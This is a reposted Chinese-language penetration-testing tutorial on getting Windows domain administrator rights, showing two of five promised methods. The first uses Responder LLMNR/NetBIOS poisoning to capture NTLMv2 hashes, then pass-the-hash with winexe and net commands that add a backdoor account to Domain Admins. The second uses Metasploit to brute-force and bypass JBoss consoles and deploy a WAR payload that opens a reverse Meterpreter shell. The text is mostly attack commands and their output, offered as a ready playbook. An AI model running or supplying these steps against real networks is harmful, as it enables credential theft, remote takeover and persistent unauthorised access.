热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

得到内网域管理员的5种常见方法

发布时间:2013-12-07 14:48文章来源:wooyun文章作者:spiderlabs 点击次数:
摘要:1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系...

1.Netbios and LLMNR Name Poisoning

这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html),但实际测试还是Responder比较好,都是套用标准库写的,很方便在目标上使用:)

~/Responder# python Responder.py -i 192.168.8.25
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.
…snip…

NBT-NS Answer sent to: 192.168.8.6
[+]SMB-NTLMv2 hash captured from : 192.168.8.6
Domain is : BEACONHILLSHIGH
User is : smccall
[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ECONOMY309\IPC$
…snip...

LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from : 192.168.8.11
Domain is : BEACONHILLSHIGH
User is : lmartin
[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ADVCHEM\311IPC$
…snip…

这里的LM, NTLMv1, or NTLMv2哈希,能够用GPU或者彩虹表暴力破解.如果在responder会话过程中,抓到一个域管理员帐号,能够直接使用winexe运行cmd.exe命令

~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.

2.利用jboss漏洞

可以前期先用nmap扫描下端口,识别出常见的JAVA应用服务器,后期配合Metasploit的auxiliary模块来利用.比如jboss漏洞.最常见的就是弱口令了吧,同理的,也可以寻找webloigc,websphere,tomcat等这些基于JAVA的应用服务器,还有最近国内政府部门部署比较多的Apusic,不过需要注意war包格式,进后台,直接部署WAR就行了.jboss的除了弱口令,还有个后台绕过,和流传很久的1337那个.用例说下如何用metasploit暴力破解jboss后台,以及部署war包.

msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080
~/work/nmap# cat http.jboss.8080 <-- 这个是开25线程字典跑8080端口jboss后台的
[*] Initializing modules...
THREADS => 25
RHOSTS => file:./8080
DICTIONARY => ./http.scan.list
RPORT => 8080
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Using code '404' as not found for 192.168.5.18
[*] Using code '404' as not found for 192.168.5.21
[*] Using code '404' as not found for 192.168.5.20
[*] Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.20:8080/web-console/ 404 (192.168.5.20)
[*] Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

 

Output from use auxiliary/scanner/http/jboss_vulnscan:
[*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console"
[*] 192.168.5.20:8080 Check for verb tampering (HEAD)
[+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering
[+] 192.168.5.20:8080 Authenticated using admin:admin
[+] 192.168.5.20:8080 /status does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200)
[+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)

 

Output from use exploit/multi/http/jboss_maindeployer: <--部署war包
msf exploit(jboss_maindeployer) > exploit

[*] Started reverse handler on 192.168.5.233:4444
[*] Sorry, automatic target detection doesn't work with HEAD requests
[*] Automatically selected target "Java Universal"
[*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ...
[*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war
[*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server...
[*] Sending the WAR archive to the server...
[*] Waiting for the server to request the WAR archive....
[*] Shutting down the web service...
[*] Executing HlusdqEcokvXH...
[+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp'
[*] Undeploying HlusdqEcokvXH...
[*] Sending stage (30355 bytes) to 192.168.5.159
[*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600

meterpreter > sysinfo
Computer : BHHSMOFF011
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java

meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\DELLBAC\EJBContainer\bin>whoami
whoami
beaconhillshigh\backup_admin

C:\>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

标签分类:

上一篇:如何导出Windows哈希系列一
下一篇:再次绕过安全狗sethc.exe阻止 实现突破提权